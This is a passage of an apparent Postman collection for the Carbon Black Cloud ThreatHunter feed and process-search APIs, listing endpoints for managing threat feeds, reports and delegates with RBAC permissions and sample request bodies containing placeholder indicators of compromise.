Feed","id":"f4d5b7a9-f70f-459d-a228-b66c429e6143","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"feedinfo\": {\n        \"name\": \"<string>\",\n        \"provider_url\": \"<string>\",\n        \"summary\": \"<string>\",\n        \"category\": \"<string>\",\n        \"source_label\": \"<string>\",\n    },\n    \"reports\": [\n        {\n            \"id\": \"<string>\",\n            \"timestamp\": \"<integer>\",\n            \"title\": \"<string>\",\n            \"description\": \"<string>\",\n            \"severity\": \"<integer>\",\n            \"link\": \"<string>\",\n            \"tags\": [\n                \"<string>\"\n            ],\n            \"iocs\": \"<IOCv1>\",\n            \"iocs_v2\": [\n                \"<IOCv2>\"\n            ],\n            \"visibility\": \"<string>\"\n        }\n    ],\n    \"delegates_auth_token\": \"ABCDEFGHIJKLMNOPQRSTU/123456789\"\n}"},"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/reserved","description":"<p>Create new reserved feed. Unique feed ID will be assigned by the service. This feed will be owned by <code>org_key</code> and available to <code>org_key</code>'s delegates at the time of creation.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#create-a-new-reserved-feed\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","reserved"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"f4d5b7a9-f70f-459d-a228-b66c429e6143"},{"name":"Delete Feed","event":[{"listen":"test","script":{"exec":["var required = ['cb_url', 'cb_org_key', 'cb_feed_id'];","for (var item in required) {","    if (!pm.environment.get(required[item])) { throw new Error(required[item] + ' Variable Not Set'); }    ","}",""],"type":"text/javascript","id":"f4aadd0c-ae63-43d1-8b8d-28e52e2a8be0"}}],"id":"79e3c993-8d74-40f6-8df8-4da8e1bc14b2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/{{cb_feed_id}}","description":"<p>Delete feed with <code>feed_id</code>. This feed must be owned by the caller.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#delete-feed\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","{{cb_feed_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"79e3c993-8d74-40f6-8df8-4da8e1bc14b2"},{"name":"Get Feed Info","id":"5ffa3f77-3fad-4d71-80dc-345f9581aea2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/{{cb_feed_id}}/feedinfo","description":"<p>Retrieve feed info metadata for feed with <code>feed_id</code>. This feed must be owned by the caller.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#get-feed-info\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","{{cb_feed_id}}","feedinfo"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"5ffa3f77-3fad-4d71-80dc-345f9581aea2"},{"name":"Update Feed Info","id":"122a21d6-cf0c-4e53-a806-17491036fd83","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"ThreatConnect Sources\",\n    \"owner\": \"7DESJ9GN\",\n    \"provider_url\": \"https://www.threatconnect.com\",\n    \"summary\": \"This is the feed summary\",\n    \"category\": \"TEST\",\n    \"source_label\": null,\n    \"access\": \"private\"\n}"},"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/{{cb_feed_id}}/feedinfo","description":"<p>Update feed info metadata for feed with <code>feed_id</code>. This feed must be owned by the caller.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#update-feed-info\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","{{cb_feed_id}}","feedinfo"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"122a21d6-cf0c-4e53-a806-17491036fd83"},{"name":"Get Reserved Feed Delegates","id":"89a41f05-f2fb-44e6-b8b5-0af8bd051086","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/reserved/{{cb_feed_id}}/delegates","description":"<p>Retrieve the delegated orgs for a reserved feed. These orgs do not own the feed but have read access to it’s contents. Feed must be owned by the caller.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#get-reserved-feed-delegates\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","reserved","{{cb_feed_id}}","delegates"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"89a41f05-f2fb-44e6-b8b5-0af8bd051086"},{"name":"Update Reserved Feed Delegates","id":"a54f7bb6-b1bb-4748-8a10-ec2966e96c22","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"delegates\": [\n        \"<string>\",\n        \"<string>\"\n    ],\n    \"delegates_auth_token\": \"<string>\"\n}"},"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/reserved/{{cb_feed_id}}/delegates","description":"<p>Update the list of organizations that can access a reserved feed.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#get-reserved-feed-delegates\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","reserved","{{cb_feed_id}}","delegates"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a54f7bb6-b1bb-4748-8a10-ec2966e96c22"},{"name":"Get Reports","id":"33345938-7767-41cd-86bf-bba5496ed7d5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/{{cb_feed_id}}/reports","description":"<p>Retrieve all the reports for feed with <code>feed_id</code>. Feed must be owned by the caller.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#get-reports\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","{{cb_feed_id}}","reports"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"33345938-7767-41cd-86bf-bba5496ed7d5"},{"name":"Replace Reports","id":"a0e983ef-d078-4a7b-a344-a52b50f954a8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"reports\": [\n        {\n            \"id\": \"sample-id-123\",\n            \"timestamp\": 1776859436,\n            \"title\": \"Sample Title\",\n            \"description\": \"Sample Description.\",\n            \"severity\": 5,\n            \"link\": \"http://sample.com\",\n            \"iocs\": {\n            \t\"md5\": [\n            \t\t\"ABCDEF1234567890ABCDEF1234567890\"\n        \t\t],\n            \t\"ipv4\": [\n        \t\t\t\"50.62.230.1\"\n        \t\t],\n            \t\"dns\": [\n            \t\t\"everydayim.com\"\n        \t\t]\n            }\n        }\n    ]\n}"},"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/{{cb_feed_id}}/reports","description":"<p>Replace reports for feed ID. All IOCs will be converted to IOC_V2. Any existing reports not in the payload will be deleted. Feed must be owned by the caller.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#replace-reports\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","{{cb_feed_id}}","reports"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a0e983ef-d078-4a7b-a344-a52b50f954a8"},{"name":"Get Report","id":"5943f6ad-263d-43a7-baea-1fc31fc4834d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/{{cb_feed_id}}/reports/{{cb_report_id}}","description":"<p>Return report with <code>report_id</code> for feed. Feed must be owned by the caller.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#get-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","{{cb_feed_id}}","reports","{{cb_report_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"5943f6ad-263d-43a7-baea-1fc31fc4834d"},{"name":"Update Report","id":"45b79d73-e8c2-422d-89a9-116289682ed3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/javascript","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"id\": \"{{cb_report_id}}\",\n    \"timestamp\": 1776859436,\n    \"title\": \"This is my super awesome test feed\",\n    \"description\": \"Pretty sweet, huh?\",\n    \"severity\": 10,\n    \"link\": \"\",\n    \"tags\": null,\n    \"iocs\": null,\n    \"iocs_v2\": [\n        {\n            \"id\": \"fdcb3745f5a8cabe517fc948fa982e63\",\n            \"match_type\": \"equality\",\n            \"values\": [\n                \"10.16.3.12\"\n            ],\n            \"field\": \"netconn_ipv4\",\n            \"link\": null\n        },\n        {\n            \"id\": \"38a32d2e4ae33f485ebac7d69c4591e6\",\n            \"match_type\": \"equality\",\n            \"values\": [\n                \"screaminggoatpiano.com\",\n                \"www.screaminggoatpiano.com\"\n            ],\n            \"field\": \"netconn_domain\",\n            \"link\": null\n        }\n    ],\n    \"visibility\": null\n}","options":{"raw":{"language":"javascript"}}},"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/{{cb_feed_id}}/reports/{{cb_report_id}}","description":"<p>Update report with <code>report_id</code> for feed. All IOCs will be converted to IOC_V2. Feed must be owned by the caller.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#update-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","{{cb_feed_id}}","reports","{{cb_report_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"45b79d73-e8c2-422d-89a9-116289682ed3"},{"name":"Delete report","id":"21bbbd69-9420-46f6-b3fc-702105fc9096","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/{{cb_feed_id}}/reports/{{cb_report_id}}","description":"<p>Delete report with <code>report_id</code> for feed . Feed must be owned by the caller.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#delete-report\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","{{cb_feed_id}}","reports","{{cb_report_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"21bbbd69-9420-46f6-b3fc-702105fc9096"},{"name":"Convert Legacy Query","id":"99492d77-ab06-47f2-834f-02a2911c2d03","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"url":"{{cb_url}}/threathunter/feedmgr/v2/query/translate","description":"<p>Convert CB Reponse query to ThreatHunter query. This will adjust field names and other syntax to match ThreatHunter Solr requirements.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#convert-legacy-query\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","query","translate"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"99492d77-ab06-47f2-834f-02a2911c2d03"}],"id":"0a253f2b-1936-4814-a278-1983a9a19734","_postman_id":"0a253f2b-1936-4814-a278-1983a9a19734","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"⚠️ Process Search v1","item":[{"name":"⚠️ Health Check","id":"8ac45f3c-3ed7-4b05-8b01-ebd5ffb81e2b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/health_check","description":"<p>This endpoint does a simple health check for the search service.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>No Permissions Required</td>\n<td>N/A</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search/#health-check\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","health_check"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"8ac45f3c-3ed7-4b05-8b01-ebd5ffb81e2b"},{"name":"⚠️ Get Events Associated with a Given Process","id":"0d59dfda-32ef-4784-b212-221f5680a10f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"search_params\": {\n        \"q\": \"*:*\",\n        \"cb.process_guid\": \"{{cb_process_guid}}\"\n    }\n}"},"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/events/_search","description":"<p>Returns all events associated with the required parameter <code>cb.process_guid</code>.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#get-events-associated-with-a-given-process\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","events","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0d59dfda-32ef-4784-b212-221f5680a10f"},{"name":"⚠️ Get Validation for Event Search","id":"5f17fede-f569-4b7b-b200-483ae879a7df","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/events/search_validation?q=","description":"<p>Validates a event search query.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#get-validation-for-event-search\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","events","search_validation"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Required. Query to validate.</p>\n","type":"text/plain"},"key":"q","value":""},{"disabled":true,"description":{"content":"<p>start time for the query</p>\n","type":"text/plain"},"key":"cb.min_backend_timestamp","value":""},{"disabled":true,"description":{"content":"<p>end time for the query</p>\n","type":"text/plain"},"key":"cb.max_backend_timestamp","value":""}],"variable":[]}},"response":[],"_postman_id":"5f17fede-f569-4b7b-b200-483ae879a7df"},{"name":"⚠️ Get Suggestions for Event Searching","id":"f016f7c9-720e-4fbf-81a4-838e604250a6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/events/search_suggestions?suggest.q=&suggest.count=","description":"<p>Provides suggestions to complete an event search.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#get-suggestions-for-event-searching\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","events","search_suggestions"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Required. Query to generate suggestions for.</p>\n","type":"text/plain"},"key":"suggest.q","value":""},{"description":{"content":"<p>Number of suggestions to return.</p>\n","type":"text/plain"},"key":"suggest.count","value":""}],"variable":[]}},"response":[],"_postman_id":"f016f7c9-720e-4fbf-81a4-838e604250a6"},{"name":"⚠️ Get Time Limits for Available Data","id":"a89e74d9-ea20-4549-92b7-258d29467f79","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/limits","description":"<p>Retrieves the lower and upper time limits for data available in the given <code>org_key</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#get-time-limits-for-available-data\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","limits"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a89e74d9-ea20-4549-92b7-258d29467f79"},{"name":"⚠️ Get a List of All Available Process Result Sets","id":"9ff83d0d-1191-4f76-9cad-0b3c4c4ec565","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/search_jobs","description":"<p>Retrieve a list of all available process result sets from the API.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#get-a-list-of-all-available-process-result-sets\">See the 